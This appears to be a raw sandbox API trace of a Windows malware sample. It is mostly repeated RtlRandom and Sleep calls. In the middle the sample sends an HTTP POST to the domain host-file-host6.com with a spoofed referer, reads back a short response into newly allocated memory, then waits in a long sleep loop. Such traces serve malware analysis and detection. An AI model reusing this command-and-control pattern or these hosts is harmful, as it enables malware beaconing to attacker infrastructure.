RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3ad24439 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc98e0e36 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xce0b6920 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x47a290a8 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x94c6ae49 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6ebc4cc2 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf3bcf81e [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2bdd78e7 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6509024f [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbb403977 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x774b9825 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2fb967f6 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1019c8ad [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6906880d [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4afab00f [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xaaf3c23e [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8463237f [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x96f41718 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbd4157c4 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x63bfd13 [0136.991] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x32c35f2c [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xde7a869c [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7569df7a [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8c52542 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7441e22c [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa9458a00 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xeeec453f [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc2d30889 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf6fb187d [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x38cbe25a [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1a04b2e [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x68c230f3 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xca964e5b [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfb36ed29 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x519b4d47 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa3be69be [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcb2ca7dc [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf66c9792 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x55e6e342 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfb8deb63 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3901d563 [0136.992] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6ea4301a [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x94ce6a9c [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9e7aa496 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9654abb4 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x96a4fcdd [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1fba4e3f [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6deb9ecf [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x551649e7 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa2ed9b91 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7deaf163 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc3897b09 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3385708b [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xaa6f6494 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9a36089f [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc71ac32e [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5703e9f4 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x59e67589 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x932650eb [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x62f20652 [0136.993] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdf9610c0 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xce634a3f [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdefe2ab3 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x24780955 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x444a6458 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x75d2b9f3 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x281b1a2c [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7e881e70 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd0d3c05f [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe33e3139 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3d8b29de [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdd1a91af [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbb1c6b99 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1619f90c [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x98484f87 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6a3f77d5 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x25bf1662 [0136.994] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x89336933 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf93c4c [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6cf05d79 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd26d63 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3be6691c [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x66a4762c [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x75e15983 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe77e9f08 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x66560014 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1cf5839e [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa6a9ced4 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x19868fc6 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9405b463 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x824b01bd [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8045dcdb [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1aae6756 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcbc14448 [0137.001] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x43676c68 [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5a3439ad [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x21ffacbb [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x52c92ca3 [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfb02dd79 [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x53af2e85 [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd37df338 [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x85dd1f0c [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd1ae5d6f [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa14754b5 [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x665edf6d [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8df90364 [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2f909c68 [0137.002] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9d18fcf0 [0137.002] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0xd4) returned 0x4a31920 [0137.002] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0137.002] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0137.002] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0137.002] lstrcatA (in: lpString1="", lpString2="*,BRd^8m#lqK[Zk\\$E9SVyC0hFtYHb&W$ciFu%-)11Tv\"SiphLfo%'er:3OW!(L4TH*zlalOK`&);((:?&_/\"&yxX)`6Q>gdL#GFk[73SZbr/;sgdL#GFk[73SZbr/;sgdL#GFk[73SZbr/;svu1]:3XucG/D_eq)5Kzk`nek7*]'jbI_,`upL" | out: lpString1="NqDkyYGY3TiN9L5.G.1.9v,+StnhYMU3XlQV1KBAFo@GGF.H718\\[0tki[^AobZevARr2V=b\\`&c?kXG^7.bYF#HuCKnT4C!eVCh7[\";E\"nsvO/@>vu1]:3XucG/D_eq)5Kzk`nek7*]'jbI_,`upL") returned="NqDkyYGY3TiN9L5.G.1.9v,+StnhYMU3XlQV1KBAFo@GGF.H718\\[0tki[^AobZevARr2V=b\\`&c?kXG^7.bYF#HuCKnT4C!eVCh7[\";E\"nsvO/@>vu1]:3XucG/D_eq)5Kzk`nek7*]'jbI_,`upL" [0137.553] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10c) returned 0x4a31a40 [0137.553] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0137.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4a31840, cbMultiByte=28, lpWideCharStr=0x4a31a40, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0137.553] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x101efc18 | out: pProxyConfig=0x101efc18) returned 1 [0137.559] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa1b3f00 [0137.560] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x101efcd0 | out: lpUrlComponents=0x101efcd0) returned 1 [0137.560] WinHttpConnect (hSession=0xa1b3f00, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa274470 [0137.560] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31b60 [0137.560] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x68) returned 0x4a31b80 [0137.560] WinHttpOpenRequest (hConnect=0xa274470, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa106af0 [0137.560] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x4e) returned 0x4a31bf0 [0137.560] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10d) returned 0x4a31c50 [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2ed34e0f [0137.560] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31d70 [0137.560] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x17) returned 0x4a31d90 [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1df37531 [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xef826e5e [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd2083565 [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9a18c4ad [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1018875 [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf4f5116c [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xde598c18 [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8b060527 [0137.560] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9fce3d54 [0137.560] wsprintfW (in: param_1=0x4a31c50, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://irckjujk.net/") returned 42 [0137.560] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31d90) returned 0x17 [0137.560] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31d90) returned 1 [0137.560] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31d70) returned 0x12 [0137.560] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31d70) returned 1 [0137.560] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31bf0) returned 0x4e [0137.561] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31bf0) returned 1 [0137.561] WinHttpAddRequestHeaders (hRequest=0xa106af0, pwszHeaders="Accept: */*\r\nReferer: http://irckjujk.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0137.561] WinHttpSendRequest (hRequest=0xa106af0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x4a31940*, dwOptionalLength=0xe5, dwTotalLength=0xe5, dwContext=0x0) returned 1 [0137.803] WinHttpReceiveResponse (hRequest=0xa106af0, lpReserved=0x0) returned 1 [0137.803] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x2800) returned 0x4a31d70 [0137.803] WinHttpReadData (in: hRequest=0xa106af0, lpBuffer=0x4a31d70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efd88 | out: lpBuffer=0x4a31d70*, lpdwNumberOfBytesRead=0x101efd88*=0x197) returned 1 [0137.804] RtlReAllocateHeap (Heap=0x4a30000, Flags=0x8, Ptr=0x4a31d70, Size=0x5000) returned 0x4a31d70 [0137.804] WinHttpReadData (in: hRequest=0xa106af0, lpBuffer=0x4a31f07, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efd88 | out: lpBuffer=0x4a31f07*, lpdwNumberOfBytesRead=0x101efd88*=0x0) returned 1 [0137.804] VirtualAlloc (lpAddress=0x0, dwSize=0x197, flAllocationType=0x3000, flProtect=0x4) returned 0x3ee0000 [0137.806] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31d70) returned 1 [0137.806] WinHttpCloseHandle (hInternet=0xa106af0) returned 1 [0137.806] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31c50) returned 0x10d [0137.806] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31c50) returned 1 [0137.806] WinHttpCloseHandle (hInternet=0xa274470) returned 1 [0137.806] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31b80) returned 0x68 [0137.807] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31b80) returned 1 [0137.808] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31b60) returned 0x12 [0137.808] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31b60) returned 1 [0137.809] WinHttpCloseHandle (hInternet=0xa1b3f00) returned 1 [0137.809] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31a40) returned 0x10c [0137.810] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31a40) returned 1 [0137.810] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31890) returned 0x9f [0137.810] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31890) returned 1 [0137.810] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31940) returned 0xee [0137.810] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31940) returned 1 [0137.811] VirtualFree (lpAddress=0x3ed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.812] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x24 [0137.813] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0137.814] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.814] Sleep (dwMilliseconds=0x258) [0138.513] Sleep (dwMilliseconds=0x258) [0139.217] Sleep (dwMilliseconds=0x258) [0139.919] Sleep (dwMilliseconds=0x258) [0140.652] Sleep (dwMilliseconds=0x258) [0141.434] Sleep (dwMilliseconds=0x258) [0142.113] Sleep (dwMilliseconds=0x258) [0142.746] Sleep (dwMilliseconds=0x258) [0143.477] Sleep (dwMilliseconds=0x258) [0144.179] Sleep (dwMilliseconds=0x258) [0145.000] Sleep (dwMilliseconds=0x258) [0145.669] Sleep (dwMilliseconds=0x258) [0146.342] Sleep (dwMilliseconds=0x258) [0147.041] Sleep (dwMilliseconds=0x258) [0147.655] Sleep (dwMilliseconds=0x258) [0148.684] Sleep (dwMilliseconds=0x258) [0149.318] Sleep (dwMilliseconds=0x258) [0149.933] Sleep (dwMilliseconds=0x258) [0149.948] Sleep (dwMilliseconds=0x258) [0149.964] Sleep (dwMilliseconds=0x258) [0149.980] Sleep (dwMilliseconds=0x258) [0149.995] Sleep (dwMilliseconds=0x258) [0150.011] Sleep (dwMilliseconds=0x258) [0150.074] Sleep (dwMilliseconds=0x258) [0150.099] Sleep (dwMilliseconds=0x258) [0150.105] Sleep (dwMilliseconds=0x258) [0150.120] Sleep (dwMilliseconds=0x258) [0150.136] Sleep (dwMilliseconds=0x258) [0150.151] Sleep (dwMilliseconds=0x258) [0150.167] Sleep (dwMilliseconds=0x258) [0150.183] Sleep (dwMilliseconds=0x258) [0150.199] Sleep (dwMilliseconds=0x258) [0150.214] Sleep (dwMilliseconds=0x258) [0150.261] Sleep (dwMilliseconds=0x258) [0150.293] Sleep (dwMilliseconds=0x258) [0150.308] Sleep (dwMilliseconds=0x258) [0150.324] Sleep (dwMilliseconds=0x258) [0150.339] Sleep (dwMilliseconds=0x258) [0150.354] Sleep (dwMilliseconds=0x258) [0150.372] Sleep (dwMilliseconds=0x258) [0150.386] Sleep (dwMilliseconds=0x258) [0150.448] Sleep (dwMilliseconds=0x258) [0150.473] Sleep (dwMilliseconds=0x258) [0150.480] Sleep (dwMilliseconds=0x258) [0150.496] Sleep (dwMilliseconds=0x258) [0150.511] Sleep (dwMilliseconds=0x258) [0150.526] Sleep (dwMilliseconds=0x258) [0150.542] Sleep (dwMilliseconds=0x258) [0150.557] Sleep (dwMilliseconds=0x258) [0150.621] Sleep (dwMilliseconds=0x258) [0150.656] Sleep (dwMilliseconds=0x258) [0150.667] Sleep (dwMilliseconds=0x258) [0150.682] Sleep (dwMilliseconds=0x258) [0150.718] Sleep (dwMilliseconds=0x258) [0150.730] Sleep (dwMilliseconds=0x258) [0150.745] Sleep (dwMilliseconds=0x258) [0150.807] Sleep (dwMilliseconds=0x258) [0150.846] Sleep (dwMilliseconds=0x258) [0150.854] Sleep (dwMilliseconds=0x258) [0150.872] Sleep (dwMilliseconds=0x258) [0150.888] Sleep (dwMilliseconds=0x258) [0150.904] Sleep (dwMilliseconds=0x258) [0150.919] Sleep (dwMilliseconds=0x258) [0150.933] Sleep (dwMilliseconds=0x258) [0151.074] Sleep (dwMilliseconds=0x258) [0151.153] Sleep (dwMilliseconds=0x258) [0151.200] Sleep (dwMilliseconds=0x258) [0151.245] Sleep (dwMilliseconds=0x258) [0151.282] Sleep (dwMilliseconds=0x258) [0151.371] Sleep (dwMilliseconds=0x258) [0151.426] Sleep (dwMilliseconds=0x258) [0151.454] Sleep (dwMilliseconds=0x258) [0151.465] Sleep (dwMilliseconds=0x258) [0151.485] Sleep (dwMilliseconds=0x258) [0151.495] Sleep (dwMilliseconds=0x258) [0151.511] Sleep (dwMilliseconds=0x258) [0151.527] Sleep (dwMilliseconds=0x258) [0151.542] Sleep (dwMilliseconds=0x258) [0151.612] Sleep (dwMilliseconds=0x258) [0151.637] Sleep (dwMilliseconds=0x258) [0151.652] Sleep (dwMilliseconds=0x258) [0151.667] Sleep (dwMilliseconds=0x258) [0151.683] Sleep (dwMilliseconds=0x258) [0151.715] Sleep (dwMilliseconds=0x258) [0151.730] Sleep (dwMilliseconds=0x258) [0151.792] Sleep (dwMilliseconds=0x258) [0151.910] Sleep (dwMilliseconds=0x258) [0151.997] Sleep (dwMilliseconds=0x258) [0152.087] Sleep (dwMilliseconds=0x258) [0152.152] Sleep (dwMilliseconds=0x258) [0152.170] Sleep (dwMilliseconds=0x258) [0152.280] Sleep (dwMilliseconds=0x258) [0152.326] Sleep (dwMilliseconds=0x258) [0152.366] Sleep (dwMilliseconds=0x258) [0152.370] Sleep (dwMilliseconds=0x258) [0152.388] Sleep (dwMilliseconds=0x258) [0152.404] Sleep (dwMilliseconds=0x258) [0152.418] Sleep (dwMilliseconds=0x258) [0152.433] Sleep (dwMilliseconds=0x258) [0152.448] Sleep (dwMilliseconds=0x258) [0152.464] Sleep (dwMilliseconds=0x258) [0152.529] Sleep (dwMilliseconds=0x258) [0152.566] Sleep (dwMilliseconds=0x258) [0152.575] Sleep (dwMilliseconds=0x258) [0152.589] Sleep (dwMilliseconds=0x258) [0152.614] Sleep (dwMilliseconds=0x258) [0152.620] Sleep (dwMilliseconds=0x258) [0152.641] Sleep (dwMilliseconds=0x258) [0152.675] Sleep (dwMilliseconds=0x258) [0152.735] Sleep (dwMilliseconds=0x258) [0152.779] Sleep (dwMilliseconds=0x258) [0152.792] Sleep (dwMilliseconds=0x258) [0152.808] Sleep (dwMilliseconds=0x258) [0152.826] Sleep (dwMilliseconds=0x258) [0152.841] Sleep (dwMilliseconds=0x258) [0152.854] Sleep (dwMilliseconds=0x258) [0152.870] Sleep (dwMilliseconds=0x258) [0152.936] Sleep (dwMilliseconds=0x258) [0152.971] Sleep (dwMilliseconds=0x258) [0152.979] Sleep (dwMilliseconds=0x258) [0152.995] Sleep (dwMilliseconds=0x258) [0153.013] Sleep (dwMilliseconds=0x258) [0153.029] Sleep (dwMilliseconds=0x258) [0153.042] Sleep (dwMilliseconds=0x258) [0153.061] Sleep (dwMilliseconds=0x258) [0153.120] Sleep (dwMilliseconds=0x258) [0153.154] Sleep (dwMilliseconds=0x258) [0153.167] Sleep (dwMilliseconds=0x258) [0153.183] Sleep (dwMilliseconds=0x258) [0153.198] Sleep (dwMilliseconds=0x258) [0153.214] Sleep (dwMilliseconds=0x258) [0153.229] Sleep (dwMilliseconds=0x258) [0153.245] Sleep (dwMilliseconds=0x258) [0153.309] Sleep (dwMilliseconds=0x258) [0153.355] Sleep (dwMilliseconds=0x258) [0153.370] Sleep (dwMilliseconds=0x258) [0153.386] Sleep (dwMilliseconds=0x258) [0153.401] Sleep (dwMilliseconds=0x258) [0153.420] Sleep (dwMilliseconds=0x258) [0153.432] Sleep (dwMilliseconds=0x258) [0153.450] Sleep (dwMilliseconds=0x258) [0153.513] Sleep (dwMilliseconds=0x258) [0153.557] Sleep (dwMilliseconds=0x258) [0153.573] Sleep (dwMilliseconds=0x258) [0153.589] Sleep (dwMilliseconds=0x258) [0153.611] Sleep (dwMilliseconds=0x258) [0153.620] Sleep (dwMilliseconds=0x258) [0153.635] Sleep (dwMilliseconds=0x258) [0153.652] Sleep (dwMilliseconds=0x258) [0153.714] Sleep (dwMilliseconds=0x258) [0153.813] Sleep (dwMilliseconds=0x258) [0153.824] Sleep (dwMilliseconds=0x258) [0153.839] Sleep (dwMilliseconds=0x258) [0153.858] Sleep (dwMilliseconds=0x258) [0153.878] Sleep (dwMilliseconds=0x258) [0153.885] Sleep (dwMilliseconds=0x258) [0153.902] Sleep (dwMilliseconds=0x258) [0153.917] Sleep (dwMilliseconds=0x258) [0153.980] Sleep (dwMilliseconds=0x258) [0154.016] Sleep (dwMilliseconds=0x258) [0154.026] Sleep (dwMilliseconds=0x258) [0154.185] Sleep (dwMilliseconds=0x258) [0154.229] Sleep (dwMilliseconds=0x258) [0154.245] Sleep (dwMilliseconds=0x258) [0154.261] Sleep (dwMilliseconds=0x258) [0154.277] Sleep (dwMilliseconds=0x258) [0154.292] Sleep (dwMilliseconds=0x258) [0154.310] Sleep (dwMilliseconds=0x258) [0154.324] Sleep (dwMilliseconds=0x258) [0154.338] Sleep (dwMilliseconds=0x258) [0154.387] Sleep (dwMilliseconds=0x258) [0154.423] Sleep (dwMilliseconds=0x258) [0154.433] Sleep (dwMilliseconds=0x258) [0154.449] Sleep (dwMilliseconds=0x258) [0154.464] Sleep (dwMilliseconds=0x258) [0154.482] Sleep (dwMilliseconds=0x258) [0154.496] Sleep (dwMilliseconds=0x258) [0154.511] Sleep (dwMilliseconds=0x258) [0154.589] Sleep (dwMilliseconds=0x258) [0154.626] Sleep (dwMilliseconds=0x258) [0154.636] Sleep (dwMilliseconds=0x258) [0154.651] Sleep (dwMilliseconds=0x258) [0154.667] Sleep (dwMilliseconds=0x258) [0154.682] Sleep (dwMilliseconds=0x258) [0154.698] Sleep (dwMilliseconds=0x258) [0154.714] Sleep (dwMilliseconds=0x258) [0154.777] Sleep (dwMilliseconds=0x258) [0154.806] Sleep (dwMilliseconds=0x258) [0154.807] Sleep (dwMilliseconds=0x258) [0154.829] Sleep (dwMilliseconds=0x258) [0154.842] Sleep (dwMilliseconds=0x258) [0154.875] Sleep (dwMilliseconds=0x258) [0154.886] Sleep (dwMilliseconds=0x258) [0154.901] Sleep (dwMilliseconds=0x258) [0154.964] Sleep (dwMilliseconds=0x258) [0155.004] Sleep (dwMilliseconds=0x258) [0155.011] Sleep (dwMilliseconds=0x258) [0155.026] Sleep (dwMilliseconds=0x258) [0155.048] Sleep (dwMilliseconds=0x258) [0155.057] Sleep (dwMilliseconds=0x258) [0155.073] Sleep (dwMilliseconds=0x258) [0155.090] Sleep (dwMilliseconds=0x258) 